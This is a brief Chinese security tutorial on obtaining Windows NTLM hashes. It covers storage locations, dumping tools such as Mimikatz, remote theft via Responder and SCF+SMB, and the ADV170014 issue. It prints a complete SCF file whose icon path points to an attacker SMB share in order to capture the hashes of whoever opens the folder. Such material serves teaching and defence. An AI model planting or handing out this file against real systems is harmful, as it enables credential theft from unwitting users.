获取 NTLM
1 相关背景
1.1 NTLM 的存储位置
- 系统数据库 SAM (Security Account Manager)
- DIT 数据库
- 内存 Cache
1.2 NTLM 的获取方式
- 从 SAM 获取
- 内存获取
- DIT 数据库获取
- WCE、PWDUMP、MIMIKATZ…
1.3 NTLM 的形式
- aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
- LMHash (windows 2008 R2 系统以后系统默认不保存 LMHash)
- NTHash
- NetHash - 主要获取该种 hash
1.4 远程获取方式(窃取)
- Responder
- HTTP + SMB
- SCF + SMB
- SQL + SMB
ADV 170014 NTLM SSO
2017 年 10 月,微软在周二补丁日公布了一份安全公告(ADV170014),这份安全公告中提到了 NTLM 身份验证方案中的一个漏洞,恶意攻击者可以利用这个漏洞来窃取哈希。
攻击者只需要将一个恶意的 SCF 文件放置在可公开访问的 Windows 文件夹中即可。
一旦文件被放在文件夹中,就会被一个神秘的 bug 执行。它会收集目标的 NTLM 密码散列,并将其发送到一个配置服务器中。
目标主机存在没有设置密码保护的一个共享文件夹,这种场景非常常见,比如办公室、学校、医院以及大多数 Windows 环境中,人们都会通过共享文件夹来共享音乐、照片以及文档。
攻击场景
非正版系统可能没有该设置:
微软在 Windows 3.11 时引入了 SCF 文件。SCF 文件其实是纯文本文件,可以用来指导 Windows 文件资源管理器执行一些基本任务。
[Shell]
Command=2
IconFile=\\192.168.1.2\sharetest.ico
[Taskbar]
Command=ToggleDesktop
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论